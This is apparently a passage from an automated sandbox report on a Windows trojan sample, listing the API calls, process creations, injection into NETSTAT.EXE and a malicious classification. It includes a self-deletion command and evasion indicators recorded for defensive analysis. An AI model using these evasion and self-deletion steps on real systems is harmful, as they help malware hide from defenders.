            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89950 NtQueueApcThread,18_2_02D89950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89560 NtWriteFile,18_2_02D89560
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8AD30 NtSetContextThread,18_2_02D8AD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89520 NtWaitForSingleObject,18_2_02D89520
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D85B0 NtCreateFile,18_2_003D85B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D8660 NtReadFile,18_2_003D8660
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D86E0 NtClose,18_2_003D86E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D8790 NtAllocateVirtualMemory,18_2_003D8790
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D85AA NtCreateFile,18_2_003D85AA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D86DA NtClose,18_2_003D86DA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D878A NtAllocateVirtualMemory,18_2_003D878A
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.287588690.00000000070D0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000005.00000002.272314311.00000000003AE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000000.272808507.000000000066E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000002.371649875.000000000127F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exeBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Fu94e0b1TR.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Fu94e0b1TR.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@6/2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Fu94e0b1TR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Fu94e0b1TR.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: netstat.pdb source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Fu94e0b1TR.exe, NETSTAT.EXE

            Data Obfuscation:

            barindex
            .NET